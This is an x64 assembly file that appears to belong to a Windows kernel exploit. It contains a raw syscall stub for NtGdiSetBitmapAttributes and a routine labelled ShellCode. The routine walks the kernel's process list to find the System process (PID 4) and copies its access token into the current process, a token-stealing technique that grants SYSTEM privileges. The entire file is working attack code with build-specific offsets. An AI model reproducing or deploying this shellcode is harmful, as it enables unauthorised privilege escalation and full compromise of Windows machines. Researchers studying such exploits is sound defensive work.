public NtGdiSetBitmapAttributes
public ShellCode

_TEXT SEGMENT

NtGdiSetBitmapAttributes PROC
		mov r10,rcx;
		mov r11,rdx;
		mov eax,125fh;
		syscall;
		ret;
NtGdiSetBitmapAttributes ENDP

ShellCode	PROC

		push rdx
		push rdi
		push rcx
		mov   rax,qword ptr gs:[188h]
		mov   rax,qword ptr [rax+70h]

		mov rdi, rax ;rdi--> currentprocess's EPROCESS

		mov rdx, qword ptr [rax + 188h] ;rdx --> flink

		_begin :
			   mov	rcx, qword ptr[rdx - 8]
			   cmp	rcx, 4
			   jz 	_end
			   mov  rdx, qword ptr [rdx]
			   jmp _begin

		_end :

			mov rax, qword ptr[rdx + 80h] ;set system process's
			mov	qword ptr[rdi + 208h], rax
			
		pop rcx
		pop rdi
		pop rdx
		ret
ShellCode	ENDP


END